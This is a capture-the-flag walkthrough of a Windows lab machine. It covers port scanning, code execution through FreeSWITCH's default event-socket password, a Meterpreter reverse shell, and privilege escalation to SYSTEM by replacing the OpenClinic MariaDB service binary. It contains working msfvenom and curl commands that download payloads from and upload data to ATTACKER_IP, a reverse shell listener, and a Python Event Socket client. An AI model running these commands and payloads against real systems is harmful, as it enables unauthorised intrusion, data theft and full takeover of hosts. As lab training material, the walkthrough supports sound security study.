Let's add the target IP to the hosts file, /etc/hosts:

```bash
sudo nano /etc/hosts
# Add this line (replace MACHINE_IP with the target's address):
MACHINE_IP target.local
```
This machine takes some time to boot up, so be patient; it took me around 20 minutes to figure out it won't respond to ping.
Enumeration
"I will hunt you down"
Let's start by scanning the machine with Nmap. Since the host does not respond to ping, Nmap's default host discovery would mark it as down and skip it, so we disable discovery with -Pn and run a TCP connect scan (-sT) with default scripts and version detection (-sC -sV) across all ports (-p-).

```bash
nmap -sCVT -p- target.local -Pn
```
```text
# This might be the output from the scan
Nmap scan report for target.local
Host is up, received user-set (0.16s latency).
Scanned at 2023-02-03 21:26:36 IST for 363s
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-02T15:35:32
| Not valid after:  2023-08-04T15:35:32
| MD5:   b737fda0e13f6d7b23b9c899a285a3b4
| SHA-1: f9ebe7c6b75232a12fdcae9bcb2493b206016b0c
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQGIaArMRp4bVBxn4LTtO+zjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjMwMjAyMTUzNTMyWhcNMjMw
| ODA0MTUzNTMyWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDe/VIy17BE60cJyuy0DmRAc5WNzM32ywhi
| nezlHDJauTM0qoRplDFH6Ma/V9FPh3SN1Zu6lpIdWbKrJyMAgoQbKLDQEa133Adm
| hmcv0HYyc3B4uSEACdBeeX1NiHm0yo0ehIe0rXYxonXLkeNFCZkNDGWYypFHed4v
| jqbsp2WgYLWwOXGcTHxgU/Hvn9173u8jeI8tnQByEsjmKwP1O4TvohgBOdfYKb9O
| 3PRWNm8rzDl4Ta7C+CmlCaUGyc+U1mTQyMgCJx+nA1v4hPYJ0ZgDOe1J5NMqxXJ+
| n2AC4F0hO+/VwVuGCn0vaLh8W0KEqoJS37yw3z7xh+SH6f16vrypAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEA3QJP+0ZugwkmUf/rPC0TS++1TX8y2eIqDxCLV6aQGvHUbMkFNRJfL2Qg
| 4toAbeYJfwrbmXZX1YMcTXBJKvHANKU06t6V7+YSm3HzwcVvKtHc4sOSu+tl6FxR
| sSWJAc++0wv9KjgQh+kyl5yIpI+kfbNrsF/xtTEVRfQ/SaZhlPlnklb/5a+qz8N2
| TIdalDvX65E6WYCiSLoBf+bcfzSuLu245NoNkizksXN7HSl1SjLGnIuebty0q1id
| zj9UKWQcco24ssXyMrLgY5PfI7P1y1jpAz/mR+g0ocFTk1kqzS9gAhtaAb2hUEc7
| CxFf8VS8S5mrhn51/fOXleY2JERz/w==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2023-02-03T16:02:35+00:00
|_ssl-date: 2023-02-03T16:02:40+00:00; +1s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
```
It's intriguing that only two ports are open, and both are tightly scoped services. The first is 3389, running 'ms-wbt-server', Nmap's label for Microsoft RDP (Terminal Services). The rdp-ntlm-info script already tells us the hostname is WIN-EOM4PK0578N (a standalone machine, since the NetBIOS domain name equals the computer name) and the build is 10.0.17763, which is Windows 10 1809 / Windows Server 2019. A quick Google search for 'ms-wbt-server' yields a helpful Nmap command for assessing the service further.
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 target.local -Pn
```

```text
# Output of the RDP script enumeration
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS
```

The three scripts do different jobs: rdp-enum-encryption lists which security layers and encryption levels the server accepts, rdp-vuln-ms12-020 checks for the MS12-020 RDP vulnerabilities without actually crashing the host, and rdp-ntlm-info pulls the hostname, domain and Windows version out of the NTLM challenge (that was already in the first scan). The result shows the server supports CredSSP (Network Level Authentication), so a valid credential is needed before a session even reaches the login screen.
Password spraying against RDP could be an option, but we have neither a username nor a password in this lab environment. In a real engagement, spraying should be done with care even when you do have a user list: failed attempts count against the account lockout threshold, so check the lockout policy first and keep guesses per account below it, or you will lock real users out.
Instead, let's explore the FreeSWITCH service on port 8021. FreeSWITCH is a free and open-source server for real-time communication applications such as WebRTC, video and Voice over IP, and it runs on Linux, Windows, macOS and FreeBSD. Port 8021 is its mod_event_socket, the Event Socket Layer (ESL): a plain-text control interface through which a client can issue FreeSWITCH API commands once it has authenticated with a password.
Weaponization
"Lock and Load"
A quick search in msfconsole for FreeSWITCH turns up an interesting module. If you switch to that module and look at its options, you'll see that the password it tries by default is 'ClueCon', which is the password FreeSWITCH ships with. Since the event socket is a plain-text, line-based protocol, we could also talk to it directly with netcat.

```text
msf > search freeswitch

# Search results might give you this particular result
   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/multi/misc/freeswitch_event_socket_cmd_exec   2019-11-03       excellent  Yes    FreeSWITCH Event Socket Command Execution
```
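What the module does on the wire is a short text exchange, so here is an added example (my own code, not the author's exp.py, not the Metasploit module and not anything from the FreeSWITCH project) that speaks the Event Socket protocol directly: connect, answer the auth/request with `auth ClueCon`, and if the reply is `+OK accepted`, send an `api` command. Called as `esl_api("target.local", 8021, "ClueCon", "version")` it is a harmless way to confirm the default password is in place before pointing an exploit at the host; FreeSWITCH's `system` api command runs a shell command on the host, which is what turns the default credential into code execution. The fake ESL server in the block is a constructed stand-in for the target's port 8021 so the script runs offline, and the version banner it returns is made up.

```python
r"""Minimal FreeSWITCH Event Socket Layer (ESL) client with an offline fake server.

Added example for this write-up: not the author's exp.py, not the Metasploit
module and not FreeSWITCH project code.  The protocol is plain text:
  server -> "Content-Type: auth/request\n\n"
  client -> "auth <password>\n\n"
  server -> "Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
  client -> "api <command>\n\n"
  server -> "Content-Type: api/response\nContent-Length: N\n\n<N bytes>"
"ClueCon" is the password FreeSWITCH ships with.  The fake server below is a
constructed stand-in for the target's port 8021 so the script runs offline.
"""
import socket
import threading

DEFAULT_PASSWORD = "ClueCon"


def _read_message(sock):
    """Read one ESL message: header lines, a blank line, then an optional body
    sized by Content-Length.  We send commands one at a time and subscribe to
    no events, so one message per read is enough for this client."""
    buf = b""
    while b"\n\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("ESL peer closed the connection")
        buf += chunk
    raw_headers, body = buf.split(b"\n\n", 1)
    headers = {}
    for line in raw_headers.decode(errors="replace").splitlines():
        key, _, value = line.partition(":")
        headers[key.strip()] = value.strip()
    length = int(headers.get("Content-Length", 0))
    while len(body) < length:
        chunk = sock.recv(4096)
        if not chunk:
            break
        body += chunk
    return headers, body[:length].decode(errors="replace")


def esl_api(host, port, password, command, timeout=5.0):
    """Authenticate and run one `api` command; return its output, or None if the
    password is rejected.  With command="version" this is a harmless check for
    the default credential; "system <cmd>" is what turns it into code execution."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        headers, _ = _read_message(sock)
        if headers.get("Content-Type") != "auth/request":
            raise ValueError(f"not an ESL socket: {headers}")
        sock.sendall(f"auth {password}\n\n".encode())
        headers, _ = _read_message(sock)
        if not headers.get("Reply-Text", "").startswith("+OK"):
            return None
        sock.sendall(f"api {command}\n\n".encode())
        _, body = _read_message(sock)
        return body


def start_fake_esl_server(password=DEFAULT_PASSWORD,
                          api_output="FreeSWITCH Version 0.0.0 (constructed fake)\n"):
    """Constructed stand-in for mod_event_socket on 127.0.0.1; returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def read_command(conn):
        data = b""
        while not data.endswith(b"\n\n"):
            chunk = conn.recv(1024)
            if not chunk:
                return None
            data += chunk
        return data.decode(errors="replace").strip()

    def handle(conn):
        with conn:
            conn.sendall(b"Content-Type: auth/request\n\n")
            if read_command(conn) != f"auth {password}":
                conn.sendall(b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n")
                return
            conn.sendall(b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n")
            while True:
                cmd = read_command(conn)
                if cmd is None:
                    return
                if cmd.startswith("api "):
                    body = api_output.encode()
                    conn.sendall(b"Content-Type: api/response\nContent-Length: %d\n\n" % len(body) + body)
                else:
                    conn.sendall(b"Content-Type: command/reply\nReply-Text: -ERR command not found\n\n")

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_esl_server()
    print(esl_api("127.0.0.1", port, DEFAULT_PASSWORD, "version"))   # fake version banner
    print(esl_api("127.0.0.1", port, "wrong-password", "version"))   # None
```

Against a real FreeSWITCH the same `esl_api` call works unchanged because the client side never depends on the fake server; only the host, port and the command you pass change. Returning None on a bad password (rather than raising) keeps the function usable as a yes/no default-credential check in a larger scan.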
```bash
# Generate a msfvenom payload (stageless x64 Meterpreter, reverse TCP)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ATTACKER_IP LPORT=9999 -f exe -o reverse.exe

# Start a python web server to host it
python -m http.server 8080

# Deliver the payload through the event socket.
# exp.py runs the given command on the target via FreeSWITCH's event socket (script not reproduced here).
python exp.py target.local 'curl http://ATTACKER_IP:8080/reverse.exe -o rev.exe'

# Start a Meterpreter handler for the session
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost ATTACKER_IP; set lport 9999; exploit"

# Finally execute the payload on the target
python exp.py target.local 'rev.exe'
# You should receive the session in msfconsole
```

```text
# Switch to a shell
meterpreter > shell
```
Exploitation
"Access Granted"

Let's get the flag now.
```text
C:\Users\Nekrotic\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,111,950,848 bytes free

# Get the flag
C:\Users\Nekrotic\Desktop>type user.txt
THM{64bca084_REDACTED}
```
Now we need to escalate privileges, or we won't be able to read the root flag.

Let's deploy winPEAS (from PEASS-ng) for Windows.

```text
# Deploy winPEAS (served from the python web server started earlier)
cd C:\Users\Nekrotic
curl http://ATTACKER_IP:8080/winPEASany_ofs.exe -o win.exe

# Execute it and save a report of the system
win.exe > report.txt

# Exfiltrate the report to get an overview of the system and what we are dealing with.
# curl --upload-file sends an HTTP PUT, so a listener that accepts PUT must be running on the attacker side.
# It might take some time because of the file size.
curl --upload-file report.txt http://ATTACKER_IP:69
```
By the way, there is a 'projects' folder on the C: drive that you might want to check.

```text
09/11/2021  07:18    <DIR>          projects

# Upon closer inspection we find:
 Directory of C:\projects\openclinic

09/11/2021  07:29    <DIR>          .
09/11/2021  07:29    <DIR>          ..
06/04/2021  22:14               250 configureCountry.bat
01/07/2021  17:20               167 configureLanguage.bat
09/11/2021  07:29    <DIR>          jdk1.8
09/11/2021  07:18           334,840 lua5.1.dll
09/11/2021  07:19    <DIR>          mariadb
07/06/2021  15:58            93,696 OpenClinicGAlogin.exe
08/05/2020  11:17            27,136 OpenClinicStartServices.exe
01/05/2021  23:45               316 stopOpenClinicHttp.bat
09/11/2021  07:30    <DIR>          tomcat8
09/11/2021  07:29    <DIR>          Uninstall
09/11/2021  07:18         1,389,568 uninstall.exe
               7 File(s)      1,845,973 bytes
               6 Dir(s)  50,207,125,504 bytes free
```

The application bundles its own MariaDB (MySQL-compatible) and Tomcat 8 under this folder; later on we could check the database for sensitive data as well if we want to.

Since we know the machine is running OpenClinic, we can search for exploits against it.
Privilege Escalation
"I am inevitable"
```bash
searchsploit openclinic
```

```text
# Output
----------------------------------------------------- -------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- -------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation  | windows/local/50448.txt
----------------------------------------------------- -------------------------
```

```bash
# Let's see what the exploit is all about
cat $(locate 50448.txt)
```

```text
# Details (as described in the exploit write-up)
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low-privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system-level privileges
# (nt authority\system) due to the service running as Local System.
# While a low-privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
# Any low-privileged user can elevate their privileges by abusing the MariaDB service:
```
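Before renaming anything, it is worth confirming the two conditions the advisory relies on: the service executable is modifiable by a low-privileged group, and the service runs as LocalSystem. On the target that is `sc qc <service>` plus `icacls <binary>`. Below is an added example (my own code, not winPEAS and not part of the exploit write-up) that parses those two outputs and gives a verdict, and it also shows what the fixed ACL looks like so the difference is visible. The two command outputs are constructed samples, and the service name `MariaDB` is an assumption rather than something the page shows.

```python
"""Check whether a Windows service binary is replaceable by a low-privileged user.

Added example for this write-up; it is not winPEAS and not code from the
OpenClinic advisory.  It parses the text output of `sc qc <service>` and
`icacls <binary>` (pasted from the target) and reports the combination the
advisory describes: a service running as LocalSystem whose executable grants
Modify or Full control to Authenticated Users (or another low-privileged
principal).  The two command outputs below are constructed samples, and the
service name "MariaDB" is an assumption rather than something the page shows.
"""
import re

# Groups every interactive, authenticated low-privileged user belongs to.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
    "builtin\\users",
}
# Service accounts whose token is worth far more than a normal user's.
HIGH_PRIV_ACCOUNTS = {"localsystem", "nt authority\\system"}
# icacls rights that let the holder overwrite the file: F (full), M (modify),
# W (write), WD (write data), and WDAC/WO (rewrite the DACL / take ownership,
# which get you to the same place in one extra step).
WRITE_RIGHTS = {"F", "M", "W", "WD", "WDAC", "WO"}

# Constructed `sc qc MariaDB` output (service name assumed).
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MariaDB
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=C:\projects\openclinic\mariadb\data\my.ini MariaDB
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MariaDB
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed `icacls C:\projects\openclinic\mariadb\bin\mysqld.exe` output
# showing the weak ACL the advisory describes (Authenticated Users: Modify) ...
SAMPLE_ICACLS_WEAK = r"""
C:\projects\openclinic\mariadb\bin\mysqld.exe NT AUTHORITY\Authenticated Users:(I)(M)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# ... and the same file after the Modify grant has been reduced to read/execute.
SAMPLE_ICACLS_FIXED = r"""
C:\projects\openclinic\mariadb\bin\mysqld.exe NT AUTHORITY\Authenticated Users:(I)(RX)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_sc_qc(output):
    """Pull service name, executable path and logon account out of `sc qc` text."""
    def field(name):
        m = re.search(r"^\s*" + name + r"\s*:\s*(.*)$", output, re.M)
        return m.group(1).strip() if m else ""
    raw_path = field("BINARY_PATH_NAME")
    # The path may be quoted, or unquoted with arguments after the .exe.
    m = re.match(r'"([^"]+)"|(.+?\.exe)', raw_path, re.I)
    binary = (m.group(1) or m.group(2)) if m else raw_path
    return {"service": field("SERVICE_NAME"), "binary": binary,
            "runs_as": field("SERVICE_START_NAME")}


def parse_icacls(output, path):
    """Return [(principal, set_of_rights)] from `icacls <path>` text.  icacls prints
    the path in front of the first ACE and indents the rest, so the path is
    stripped before matching.  Inheritance flags such as (I) stay in the set but
    are harmless because they are not in WRITE_RIGHTS."""
    ace_re = re.compile(r"^(?P<who>[^:]+):(?P<perms>(?:\([^)]*\))+)\s*$")
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ace_re.match(line)
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        rights = {tok.strip() for grp in re.findall(r"\(([^)]*)\)", m.group("perms"))
                  for tok in grp.split(",")}
        aces.append((m.group("who").strip(), rights))
    return aces


def audit_service(sc_qc_output, icacls_output):
    """Combine both outputs into one verdict on the service binary."""
    svc = parse_sc_qc(sc_qc_output)
    svc["writable_by"] = [who for who, rights in parse_icacls(icacls_output, svc["binary"])
                          if who.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]
    svc["exploitable"] = bool(svc["writable_by"]) and svc["runs_as"].lower() in HIGH_PRIV_ACCOUNTS
    return svc


if __name__ == "__main__":
    for label, acl in (("weak", SAMPLE_ICACLS_WEAK), ("fixed", SAMPLE_ICACLS_FIXED)):
        v = audit_service(SAMPLE_SC_QC, acl)
        print(f"{label}: {v['binary']} runs as {v['runs_as']}, "
              f"writable by {v['writable_by']}, exploitable: {v['exploitable']}")
```

Run on the target, you would paste the real `sc qc` and `icacls` output into the two strings (or feed them in from `subprocess`); the verdict is only `exploitable` when both conditions hold, which is exactly why a Modify grant on a binary started by a LocalSystem service is worth more than the same grant on a user-run program. The fixed sample also shows the remediation: drop Authenticated Users to (RX) on the bin folders and let only Administrators and SYSTEM write there.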
Woohoo!! Let's see if we can get SYSTEM on this machine using the method described.

```bash
# Generate the payload first (on the attacker machine)
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=6969 -f exe > mysqld_evil.exe
```

```text
# Inside the victim machine, from the shell we already have
cd C:\projects\openclinic\mariadb\bin
# Create a backup of the original mysqld.exe (Authenticated Users have Modify here, so this works as a low-privileged user)
ren mysqld.exe mysqld.bak
# Deploy the payload in its place (the python web server from earlier is still serving it)
curl http://ATTACKER_IP:8080/mysqld_evil.exe -o mysqld.exe
```

```bash
# Start a netcat listener on your local machine
nc -lvnp 6969
```

```text
# Restart the victim computer from the previous shell; we cannot restart the service itself,
# but the MariaDB service starts at boot and will run our binary as LocalSystem
powershell Restart-Computer
# Now wait for the magic to happen
```
After a few moments, you should receive the connection in your netcat listener.

```text
C:\Windows\system32>whoami
nt authority\system

# We are SYSTEM. Get the root flag
C:\Windows\system32>type C:\Users\Nekrotic\Desktop\root.txt
THM{8c8bc5558f0f_REDACTED}
```
Thank you for reading my post, have a great rest of your day, and good hunting :)